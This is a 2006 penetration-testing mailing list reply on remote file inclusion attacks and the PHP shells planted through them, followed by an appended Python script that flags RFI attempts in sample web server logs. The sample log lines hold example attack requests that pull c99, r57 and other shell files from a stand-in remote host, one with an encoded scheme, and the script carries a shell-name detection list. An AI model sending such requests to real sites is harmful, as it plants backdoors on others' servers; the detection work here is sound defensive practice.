Penetration Testing mailing list archives

Re: Remote File Include Vulns (Are you testing for it, are you teaching it)


From: espen () multigeeks com
Date: Mon, 16 Oct 2006 23:37:15 +0200

Quoting Joseph McCray <joe () learnsecurityonline com>:

I've been spending a lot of time googling these php shells (c99/r57 et
al) lately. It appears that people are getting these on servers via
Remote File Include vulnerabilities.

I'm curious how many auditors are 1) testing for this stuff in your
audits. Tons of blog, forum, and wiki packages have these vulns - are
you guys testing for this stuff, and more importantly are you finding it
vuln in your audits?


--
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe () learnsecurityonline com
Web:        https://www.learnsecurityonline.com


Learn Security Online, Inc.

* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access



Hi Joe,

remote file inclusion (RFI) has become a huge problem and security gap over the last couple of years, therefore I believe that this is something to be taken seriously. These vulnerabilities are very easy to exploit; I see it being exploited pretty often, usually by script kiddies whose goal is to deface the site - but often also to dump forum databases etc.

To give you a little example of this, my brother owns a site which was vulnerable to RFI. Someone exploited this and set up a paypal scam site. Luckily enough, the web host suspended the page temporarily to let him clean up the mess.

Also, when the web servers have writable directories, it is easy for the attacker to upload different kinds of (malicious?) stuff. Usually backdoors, trojans, psybncs/eggdrops etc. As you probably understand, a lot of these boxes are being used for DDoSing purposes etc.
Another thing that's good for the attacker is if safe mode is set to off.

As I've mentioned earlier, I believe this is something to *really* take seriously, especially while performing pen-tests.


Excuse my English.

Regards,
Espen D.
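
A small detection example, added here and not part of the thread or either author's message: it scans constructed Apache-style access-log lines for requests in which a query parameter value points at a remote URL (the shape of an RFI attempt, including a percent-encoded scheme) and tags the c99/r57 shell file names the thread mentions. The client addresses, paths and timestamps are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format, trimmed to what we need).
SAMPLE_LOG = """\
10.0.0.5 - - [16/Oct/2006:23:10:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [16/Oct/2006:23:12:44 +0200] "GET /index.php?page=http://203.0.113.7/c99.txt HTTP/1.1" 200 9811
10.0.0.9 - - [16/Oct/2006:23:13:02 +0200] "GET /forum/view.php?dir=ftp://203.0.113.7/r57.txt HTTP/1.1" 500 0
10.0.0.21 - - [16/Oct/2006:23:15:30 +0200] "GET /index.php?page=%68ttp://203.0.113.7/shell.txt HTTP/1.1" 200 100
10.0.0.3 - - [16/Oct/2006:23:16:10 +0200] "GET /search.php?q=visit+http://example.org HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')
# A parameter value that *starts* with a remote scheme is the classic RFI shape;
# a URL appearing later inside a value (e.g. a search term) is not flagged.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
KNOWN_SHELLS = ("c99", "r57")  # shell names mentioned in the thread

def rfi_candidates(line):
    """Return (param, value, shell_name_or_None) for every parameter whose
    decoded value begins with a remote URL scheme."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    # parse_qsl percent-decodes values, so %68ttp:// is seen as http://
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_SCHEME_RE.match(value):
            shell = next((s for s in KNOWN_SHELLS if s in value.lower()), None)
            hits.append((name, value, shell))
    return hits

def scan(log_text):
    """Scan a whole log; return (line_number, client_ip, param, value, shell) per hit."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        ip = line.split(" ", 1)[0]
        for param, value, shell in rfi_candidates(line):
            findings.append((n, ip, param, value, shell))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Flagged lines are candidates for review, not proof of compromise; a 200 response with a large body on such a request is the pattern worth checking first.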


